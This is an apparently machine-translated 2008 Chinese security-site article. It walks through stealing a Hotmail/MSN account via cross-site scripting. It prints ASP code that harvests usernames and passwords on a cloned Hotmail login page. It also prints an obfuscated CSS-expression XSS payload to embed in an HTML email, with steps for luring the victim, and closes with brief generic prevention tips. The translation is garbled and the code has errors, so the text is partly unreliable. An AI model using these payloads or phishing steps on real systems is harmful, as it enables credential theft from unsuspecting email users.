The instance profile“cross-site intrusion” watch out for MSN account lost-vulnerability warning-the black bar safety net

ID MYHACK58:62200820066
Type myhack58
Reporter 佚名
Modified 2008-08-18T00:00:00


Last time we introducedwhat is thecross-site attacks(Cross Site Scripting), today we look at a specific example, and describes how to avoid suffering cross-site attacks.

“Cross-site intrusion”crime reduction: cross-site intrusion MSN hacking

We according to users provide clues to his MSN account is lost for crime reduction, and reasoning how hackers steal his MSN account.

The first step: hack the first to make a and the Hotmail login interface is the same as the forged web page. Sign in Hotmail official website, and then click in the menu bar“file”in the popup drop-down menu, select“Save As”, save the page down. Then use Dreamweaver and other web editing program can open saved web page in Figure 1, find the Enter the username and password of the position, added this user name and password-stealing code:

! Figure 1

<% bbsuser =request("bbsuser ") bbspwd =request("bbspwd ") set fs=server. CreateObject("Scripting. FileSystemObject") //Open the file service set file=fs. OpenTaxtFile(server. MapPath("Hotmail.txt"),8,True) //Create the open"Hotmail.txt" file. writeline bbsuser+"----"+ bbspwd //Will receive user name and password write"Hotmail.txt" file. close set file=nothing set fs=nothing %>

Then Hotmail the original page in the link-local address and the associated parameters modified, so that the picture can display properly, and finally the web page is saved as“index. asp”and upload it to the hackers own website.

Second step: camouflage pages do well, the next hack will make cross-site Hotmail email. Generally hackers will choose to be directly in the message edit the HTML code of a software, such as DreamMail to. Start DreamMail, create a new support POP3 e-mail address.

Then click on DreamMail menu bar“view”“switch to the Deluxe version”option, but also with DreamMail new seal HTML blank email in mail content page, Click right key, select“Edit HTML source”in the pop-up HTML source editor window, enter the followingXSScross-site code:

<font color="ffffff"> <div id="jmp" style="display:none">nop</div> <div id="ly" style="display:none">function ok(){return true};window. onerror=ok</div> <div id="tip" title="<a style="display:none">" style="display:none"></div> <div id="tap" title="<" style="display:none"></div> <div id="tep" title=">" style="display:none"></div> <style>div{background-image:expression(javascript:1? document. write(EC_tip. title+';top:'+EC_tap. title+'/a'+EC_tep. title+EC_tap. title+'script id=nop'+EC_tep. title+EC_ly. innerHTML+EC_tap. title+'/script'+EC_tep. title+EC_tap. title+'script src='+EC_tep. title+EC_tap. title+'/script'+EC_tep. title):1=1);}</style></font>

In this code, The hack will be based on their camouflaged web address and email change“” the link address. Message edited after clicking on“OK”to complete the Cross-Station messages are produced.

The third step: the hack will give yourself of this e-mail from a loud tempting name, and then sent to the victim's MSN mailbox, when the victim used Hotmail to view this email, it will pop up a Hotmail login box to trick you to enter the account number and password to login. The victim vigilance is weak, it will be in the malicious page, enter the account number and password, this information is not sent to Microsoft on the server, but quietly sent to the hack there 2 to.

! Figure 2

Cross-site prevention program

To preventingXSScross-site attacks, ordinary users in addition to do not click on the strange letter and of the network links, best turn off the browser's JavaScript function. In addition, it can also be IE's security level set to the highest, this can also prevent the Cookie from being stolen. Site managers in the production of web pages, pay attention to filter user input for special characters, so you can avoid most of theXSSattack. If network managers find there for their own site to cross-site attacks, it is necessary to timely to be a cross-site program repair.